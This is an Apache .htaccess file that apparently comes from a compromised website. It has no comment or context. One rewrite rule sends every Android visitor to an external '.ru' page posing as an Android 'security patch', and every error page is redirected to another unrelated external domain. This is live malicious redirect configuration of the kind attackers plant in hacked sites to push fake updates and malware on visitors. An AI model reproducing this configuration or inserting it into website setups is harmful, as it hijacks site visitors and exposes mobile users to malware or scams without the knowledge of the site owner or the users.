RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} .*ndroid.*
RewriteRule ^(.*)$ http://official.androidsecurityfixers.ru/securitypatch.php
ErrorDocument 400 http://mxrxxs.com
ErrorDocument 401 http://mxrxxs.com
ErrorDocument 403 http://mxrxxs.com
ErrorDocument 404 http://mxrxxs.com
ErrorDocument 500 http://mxrxxs.com